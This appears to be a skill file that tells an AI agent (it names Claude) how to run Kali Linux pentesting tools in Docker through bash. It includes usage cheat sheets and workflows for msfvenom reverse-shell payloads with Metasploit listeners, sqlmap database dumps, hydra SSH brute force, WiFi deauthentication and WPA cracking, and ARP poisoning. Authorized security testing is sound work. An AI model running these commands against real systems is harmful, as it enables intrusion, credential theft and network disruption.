Kali Docker Pentesting Skill
Overview
This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.
Container Management
Starting the Container
```bash
# Basic start
docker run -d --name kali \
  -v "$(pwd)/workspace:/workspace" \
  -v "$(pwd)/results:/results" \
  kali-comprehensive

# With network capabilities (for actual scanning)
docker run -d --name kali \
  -v "$(pwd)/workspace:/workspace" \
  -v "$(pwd)/results:/results" \
  --cap-add=NET_RAW \
  --cap-add=NET_ADMIN \
  --network host \
  kali-comprehensive

# With GUI access (VNC)
docker run -d --name kali \
  -v "$(pwd)/workspace:/workspace" \
  -p 5900:5900 \
  -p 3389:3389 \
  kali-comprehensive
```
Running Commands
```bash
# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Copy files out
docker cp kali:/results/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/workspace/
```
Container Lifecycle
```bash
# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali
```
Tool Catalog
🔍 Network Discovery & Scanning
nmap - Network Mapper
Description: Industry-standard network scanner for host discovery, port scanning, and service detection.
Usage:
```bash
# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results
docker exec kali nmap -sV -oA /results/scan 192.168.1.0/24
```
Common Options:
- `-sS` - SYN stealth scan
- `-sT` - TCP connect scan
- `-sU` - UDP scan
- `-sV` - Version detection
- `-O` - OS detection
- `-A` - Aggressive scan (OS, version, scripts, traceroute)
- `-p-` - Scan all 65535 ports
- `-Pn` - Skip ping (assume host is up)
- `-T4` - Faster timing (0-5)
- `-oA` - Output all formats
masscan - Fast Port Scanner
Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.
Usage:
```bash
# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /results/masscan.txt
```
netdiscover - Network Discovery
Description: Active/passive ARP reconnaissance tool.
Usage:
```bash
# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
```
arp-scan - ARP Scanner
Description: Discovers IPv4 hosts using ARP.
Usage:
```bash
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24
```
🌐 Web Application Testing
nikto - Web Server Scanner
Description: Web server vulnerability scanner.
Usage:
```bash
# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde
```
dirb - Directory Brute Forcer
Description: Web content scanner.
Usage:
```bash
# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /results/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt
```
gobuster - Directory/DNS Enumeration
Description: Fast directory and DNS enumeration tool.
Usage:
```bash
# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
```
wfuzz - Web Fuzzer
Description: Web application fuzzer.
Usage:
```bash
# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ

# POST data fuzzing (FUZZ takes the first -z list, FUZ2Z the second)
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
```
sqlmap - SQL Injection Tool
Description: Automatic SQL injection and database takeover tool.
Usage:
```bash
# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
```
wpscan - WordPress Scanner
Description: WordPress vulnerability scanner.
Usage:
```bash
# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
```
whatweb - Website Fingerprinting
Description: Identifies websites and web technologies.
Usage:
```bash
# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /workspace/urls.txt
```
🔐 Password Attacks
john - John the Ripper
Description: Fast password cracker.
Usage:
```bash
# Crack with default wordlist
docker exec kali john /workspace/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /workspace/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /workspace/hashes.txt

# Show cracked passwords
docker exec kali john --show /workspace/hashes.txt

# Incremental mode
docker exec kali john --incremental /workspace/hashes.txt
```
hashcat - Advanced Password Recovery
Description: World's fastest password cracker.
Usage:
```bash
# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Show results
docker exec kali hashcat -m 0 hashes.txt --show
```
Hash Modes:
- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcrypt
hydra - Network Password Cracker
Description: Fast network logon cracker.
Usage:
```bash
# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Other protocols: hydra takes one service per run, e.g. HTTP basic auth
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 http-get /
```
medusa - Parallel Password Cracker
Description: Speedy, parallel, modular login brute-forcer.
Usage:
```bash
# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
```
crunch - Wordlist Generator
Description: Generates custom wordlists.
Usage:
```bash
# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /results/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /results/numbers.txt

# Pattern-based (min and max length must equal the pattern length)
docker exec kali crunch 8 8 -t pass@@@@ -o /results/pattern.txt
```
📡 Wireless Security
aircrack-ng - WiFi Security Suite
Description: Complete suite for assessing WiFi network security.
Usage:
```bash
# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
```
wifite - Automated Wireless Attack
Description: Automated wireless attack tool.
Usage:
```bash
# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific interface, killing conflicting processes first
docker exec kali wifite -i wlan0 --kill
```
reaver - WPS Attack
Description: Brute force WPS PINs.
Usage:
```bash
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
```
🕵️ Information Gathering
theharvester - Email/Subdomain Harvester
Description: Gather emails, subdomains, IPs from public sources.
Usage:
```bash
# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /results/harvest
```
dnsrecon - DNS Enumeration
Description: DNS enumeration and network reconnaissance.
Usage:
```bash
# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
```
sublist3r - Subdomain Enumeration
Description: Fast subdomain enumeration using OSINT.
Usage:
```bash
# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /results/subdomains.txt
```
enum4linux - SMB Enumeration
Description: Tool for enumerating information from Windows and Samba systems.
Usage:
```bash
# Full enumeration
docker exec kali enum4linux -a 192.168.1.1

# User enumeration
docker exec kali enum4linux -U 192.168.1.1

# Share enumeration
docker exec kali enum4linux -S 192.168.1.1
```
dmitry - Deep Information Gathering
Description: Deepmagic Information Gathering Tool.
Usage:
```bash
# Full scan
docker exec kali dmitry -winsepo /results/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com
```
🛡️ Exploitation Frameworks
metasploit-framework - Penetration Testing Framework
Description: The world's most used penetration testing framework.
Usage:
```bash
# Start msfconsole
docker exec -it kali msfconsole

# Generate payload (use -o so the file is written inside the container;
# a shell redirect after "docker exec" would write to the host instead)
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe

# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"

# Run resource script
docker exec kali msfconsole -r /workspace/script.rc
```
Common msfvenom payloads:
```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
```
social-engineer-toolkit (SET)
Description: Social engineering penetration testing framework.
Usage:
```bash
# Start SET
docker exec -it kali setoolkit
```
🔬 Forensics & Analysis
binwalk - Firmware Analysis
Description: Analyze and extract firmware images.
Usage:
```bash
# Scan for embedded files
docker exec kali binwalk /workspace/firmware.bin

# Extract files
docker exec kali binwalk -e /workspace/firmware.bin

# Signature scan
docker exec kali binwalk --signature /workspace/file.bin
```
foremost - File Carving
Description: Recover files based on headers and footers.
Usage:
```bash
# Recover all file types
docker exec kali foremost -i /workspace/image.dd -o /results/recovered

# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /workspace/image.dd -o /results/
```
volatility - Memory Forensics
Description: Advanced memory forensics framework.
Usage:
```bash
# Get image info
docker exec kali volatility -f /workspace/memory.dump imageinfo

# List processes
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /results/
```
strings - Extract Strings
Description: Extract printable strings from files.
Usage:
```bash
# Basic extraction (redirect inside the container so /results is the container path)
docker exec kali sh -c 'strings /workspace/binary > /results/strings.txt'

# Minimum length 10
docker exec kali strings -n 10 /workspace/binary

# Unicode strings (16-bit little-endian)
docker exec kali strings -e l /workspace/binary
```
exiftool - Metadata Extraction
Description: Read and write meta information in files.
Usage:
```bash
# View metadata
docker exec kali exiftool /workspace/image.jpg

# Remove all metadata
docker exec kali exiftool -all= /workspace/image.jpg

# Batch process
docker exec kali exiftool /workspace/*.jpg
```
🔄 Reverse Engineering
ghidra - Software Reverse Engineering
Description: NSA's software reverse engineering framework.
Usage:
```bash
# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode: <project directory> <project name> -import <binary>
docker exec kali analyzeHeadless /workspace project -import /workspace/binary.exe
```
radare2 - Reverse Engineering Framework
Description: Advanced reverse engineering framework.
Usage:
```bash
# Open binary
docker exec -it kali r2 /workspace/binary

# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /workspace/binary"

# Disassemble (-q quits after running the command instead of dropping into the prompt)
docker exec kali r2 -qc 'pd 10' /workspace/binary
```
gdb - GNU Debugger
Description: Standard debugger for Unix systems.
Usage:
```bash
# Debug binary
docker exec -it kali gdb /workspace/binary

# With PEDA
docker exec -it kali gdb -q /workspace/binary
```
🎯 Vulnerability Assessment
lynis - Security Auditing
Description: Security auditing tool for Unix/Linux systems.
Usage:
```bash
# Full audit
docker exec kali lynis audit system

# Quick scan
docker exec kali lynis audit system --quick
```
nikto - Web Vulnerability Scanner
(See Web Application Testing section)
openvas - Vulnerability Scanner
Description: Full-featured vulnerability scanner.
Usage:
```bash
# Start OpenVAS (requires initialization)
docker exec kali openvas-start
```
📊 Network Analysis
tcpdump - Packet Capture
Description: Command-line packet analyzer.
Usage:
```bash
# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /results/capture.pcap

# Read file
docker exec kali tcpdump -r /results/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'
```
tshark - Network Protocol Analyzer
Description: Terminal-based Wireshark.
Usage:
```bash
# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /results/capture.pcap

# Filter display
docker exec kali tshark -r /results/capture.pcap -Y 'http.request'
```
ettercap - Network Sniffer/Interceptor
Description: Comprehensive suite for MITM attacks.
Usage:
```bash
# Text mode
docker exec -it kali ettercap -T -i eth0

# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
```
Common Pentesting Workflows
1. Network Reconnaissance
```bash
# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /results/hosts

# Step 1b: -oA writes hosts.nmap/.gnmap/.xml, not hosts.txt; pull the live IPs out of the greppable file
docker exec kali sh -c "awk '/Status: Up/ {print \$2}' /results/hosts.gnmap > /results/hosts.txt"

# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /results/hosts.txt -oA /results/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /results/services
```
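Feeding step 1 into step 2 means parsing nmap's greppable output (the `.gnmap` file that `-oA` writes). The helper below is an added example, not part of the skill or of nmap: `live_hosts` builds the list `-iL` expects and `open_ports` summarises the step-2 results per host, dropping closed and filtered ports. The `.gnmap` sample is constructed.

```shell
#!/bin/sh
# Added helper (not from the skill): parse nmap greppable output (.gnmap)
# into a host list for "-iL" and a per-host open-port summary.

# Constructed sample of a .gnmap file: two hosts up, one down. Fields are
# tab-separated; each port entry is port/state/proto/owner/service/rpc/version.
SAMPLE_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated as: nmap -sV -p- -oA /results/ports 192.168.1.0/24' \
  'Host: 192.168.1.1 ()\tStatus: Up' \
  'Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx/, 443/closed/tcp//https///\tIgnored State: filtered (65532)' \
  'Host: 192.168.1.5 ()\tStatus: Up' \
  'Host: 192.168.1.5 ()\tPorts: 3389/open/tcp//ms-wbt-server///' \
  'Host: 192.168.1.9 ()\tStatus: Down' \
  '# Nmap done: 256 IP addresses (2 hosts up) scanned')

# live_hosts FILE: one IP per line for every host nmap marked "Status: Up".
live_hosts() {
  awk '/Status: Up/ { print $2 }' "$1" | sort -u
}

# open_ports FILE: "ip port/proto service" for each open port only.
open_ports() {
  awk -F'\t' '
    /Ports:/ {
      ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
      ports = ""
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, entry, ", ")
      for (j = 1; j <= n; j++) {
        split(entry[j], f, "/")
        if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
      }
    }' "$1"
}

# Demo on the constructed sample. With real data the equivalent is:
#   live_hosts /results/hosts.gnmap > /results/hosts.txt
SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_GNMAP" > "$SAMPLE_FILE"
echo "Live hosts:"; live_hosts "$SAMPLE_FILE"
echo "Open ports:"; open_ports "$SAMPLE_FILE"
rm -f "$SAMPLE_FILE"
```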
2. Web Application Assessment
```bash
# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /results/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
```
3. Password Cracking Workflow
```bash
# Step 1: Generate wordlist (with -t, min and max length must match the pattern length)
docker exec kali crunch 8 8 -t Pass@@@@ -o /results/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/results/wordlist.txt /workspace/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /workspace/users.txt -P /results/wordlist.txt ssh://192.168.1.1
```
4. Wireless Network Assessment
```bash
# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
```
5. Exploitation Workflow
```bash
# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
```
File Management
Copying Files Between Host and Container
```bash
# Copy TO container
docker cp ./local-file.txt kali:/workspace/

# Copy FROM container
docker cp kali:/results/scan.txt ./output/

# Copy directory
docker cp kali:/results/ ./output/
```
Working with Wordlists
Common Wordlist Locations:
- `/usr/share/wordlists/rockyou.txt` - Most popular password list
- `/usr/share/wordlists/dirb/common.txt` - Common directories
- `/usr/share/seclists/` - SecLists collection
- `/usr/share/wordlists/metasploit/` - Metasploit wordlists
```bash
# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
```
Troubleshooting
Container Won't Start
```bash
# Check logs
docker logs kali

# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive
```
Network Issues
```bash
# Use host network
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
```
Permission Issues
```bash
# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results
```
Metasploit Database Issues
```bash
# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status
```
Best Practices
1. Always Save Results
```bash
# Use output flags
-o filename.txt        # Generic output
-oA basename           # Nmap: all formats
-w filename            # Write to file
> /results/output.txt  # Shell redirect: run it inside the container (docker exec kali sh -c '...'),
                       # otherwise the redirect is applied by the host shell and the file lands on the host
```
2. Use Volumes for Persistence
Mount volumes for:
- `/workspace` - Working files
- `/results` - Scan results
- `/wordlists` - Custom wordlists
3. Scope Your Testing
Always:
- Get written authorization
- Define scope boundaries
- Document everything
- Report findings responsibly
4. Clean Up After Testing
```bash
# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files
docker exec kali rm -rf /tmp/*

# Archive results
docker exec kali tar -czf /results/assessment-$(date +%Y%m%d).tar.gz /results/*.txt
```
Quick Reference
Port Scanning
```bash
docker exec kali nmap -sV -p- target
```
Directory Enumeration
```bash
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
```
SQL Injection
```bash
docker exec kali sqlmap -u "http://target/page?id=1" --batch
```
Password Cracking
```bash
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
Network Brute Force
```bash
docker exec kali hydra -l admin -P passwords.txt ssh://target
```
WiFi Cracking
```bash
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap
```
When to Use This Skill
Use this skill when:
- Conducting authorized penetration testing
- Performing security assessments
- Testing network security
- Analyzing web applications
- Cracking passwords (authorized)
- Wireless security auditing
- Forensics analysis
- Reverse engineering
- Learning security techniques
Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.